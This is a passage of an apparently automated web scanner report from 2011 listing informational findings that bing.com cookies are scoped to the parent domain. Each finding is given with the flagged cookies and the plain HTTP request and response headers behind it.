MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c635024954b6e4cedb19420ef37d99b0d; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621024&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/search?q=ozzy+osbourne+justin+bieber&form=msnhpm HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

16.239. http://www.bing.com/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_HOP=I=1&TS=1296345125; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:05 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296345125; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

16.240. http://www.bing.com/sck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/sck

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=8F56128DF29B4CAD864EBD862D193285; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sck HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close
Set-Cookie: _SS=SID=8F56128DF29B4CAD864EBD862D193285; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

Ref A: D0950E1EACE249D2BE0BE1B31B83ECCD Ref B: B9B3F609E20511FB646C8CF91E038C47 Ref C: Sat Jan 29 15:53:31 2011
PST

16.241. http://www.bing.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_HOP=I=1&TS=1296352332; domain=.bing.com; path=/
_SS=SID=CE537EFA8ED64BCEAACF15BE98BD87C5; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:12 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?FORM=FOXSP HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /?scope=web&mkt=en-US&FORM=FOXSP
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 01:52:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: _HOP=I=1&TS=1296352332; domain=.bing.com; path=/
Set-Cookie: _SS=SID=CE537EFA8ED64BCEAACF15BE98BD87C5; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:12 GMT; domain=.bing.com; path=/
Content-Length: 0

16.242. http://www.bing.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_FS=mkt=en-US; domain=.bing.com; path=/
_SS=SID=F92E124C97024B2EB73676F002B255BD; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:27 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?q=January+29&mkt=en-us&FORM=MSNHPT HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:27 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=F92E124C97024B2EB73676F002B255BD; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:27 GMT; domain=.bing.com; path=/

Ref A: 6A237C8B92934F8E8A82206F4C282E05 Ref B: E54BF75E2FC67B06BF4FA201E1C9AABE Ref C: Sat Jan 29 15:53:27 2011
PST

16.243. http://www.bing.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/search/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_HOP=I=1&TS=1296352333; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 01:52:13 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296352333; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/

16.244. http://www.bing.com/shopping previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=D762CB0D516241079F4B337C6DF4AD2D; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c022f29fb83dd41979e53da7917adbbcf; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 93192
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:52 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:53 GMT
Connection: close
Set-Cookie: _SS=SID=D762CB0D516241079F4B337C6DF4AD2D; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c022f29fb83dd41979e53da7917adbbcf; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

16.245. http://www.bing.com/shopping/bird-feeders/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/bird-feeders/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=C5B30FDE5AF1459BB45DF470E55CE4D3; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c47521b9f211b4590b705c63c8b0cb105; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/bird-feeders/search?q=squirrel-proof%20bird%20feeders&p1=%5bCommerceService%20scenario%3d%22f%22%20r%3d%22pricelow%7c10%2cpricehigh%7c25%2cleafcategoryid%7c5289%22%5d&vw=gr&FORM=SHOPH1&crea=012911feedersa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

16.246. http://www.bing.com/shopping/content/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/content/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=F972E03C2EDF4FC68C89EA08C563AB35; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7643fc9f42644b73a510efc43bf9535c; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/content/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 21920
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:46 GMT
Connection: close
Set-Cookie: JSESSIONID=1A7DB7C3FD212CE528E8DB8E0E3E23F1; Path=/shopping
Set-Cookie: _SS=SID=F972E03C2EDF4FC68C89EA08C563AB35; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7643fc9f42644b73a510efc43bf9535c; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:46 GMT; domain=.bing.com; path=/

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">



...[SNIP]...

16.247. http://www.bing.com/shopping/healthy-cooking/r/151 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/healthy-cooking/r/151

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=C18100C403AB4700AAFD75B59C0FBDDD; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c1c459af2715848119a7e3c09ded2dd85; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/healthy-cooking/r/151 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51707
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:53:15 GMT
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:16 GMT
Connection: close
Set-Cookie: _SS=SID=C18100C403AB4700AAFD75B59C0FBDDD; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c1c459af2715848119a7e3c09ded2dd85; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:16 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

16.248. http://www.bing.com/shopping/makeup/c/4259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/makeup/c/4259

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=5FA465270473442F834AFBC0420AA035; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:43 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c78f39d7b1f8a41d483fe8915fb7f5047; expires=Tue, 29-Jan-2013 17:09:43 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:44 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/makeup/c/4259 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81823
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:42 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:43 GMT
Connection: close
Set-Cookie: _SS=SID=5FA465270473442F834AFBC0420AA035; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:43 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c78f39d7b1f8a41d483fe8915fb7f5047; expires=Tue, 29-Jan-2013 17:09:43 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:44 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

16.249. http://www.bing.com/shopping/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=24F36415AB2F4ACC97A8D69FEBC50EE4; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce9aae95052e74b3bb915721c523f685a; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16318
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:49 GMT
Connection: close
Set-Cookie: _SS=SID=24F36415AB2F4ACC97A8D69FEBC50EE4; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce9aae95052e74b3bb915721c523f685a; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:49 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

16.250. http://www.bing.com/shopping/swimwear/c/4503 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/shopping/swimwear/c/4503

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_SS=SID=F36266FD84BF426991CE02A2CFF4A782; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c62852a01ec264ed0b807e0bd957f015d; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/swimwear/c/4503 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 82370
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:30 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:31 GMT
Connection: close
Set-Cookie: _SS=SID=F36266FD84BF426991CE02A2CFF4A782; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c62852a01ec264ed0b807e0bd957f015d; expires=Tue, 29-Jan-2013 17:09:31 GMT; domain=.bing.com; path=/
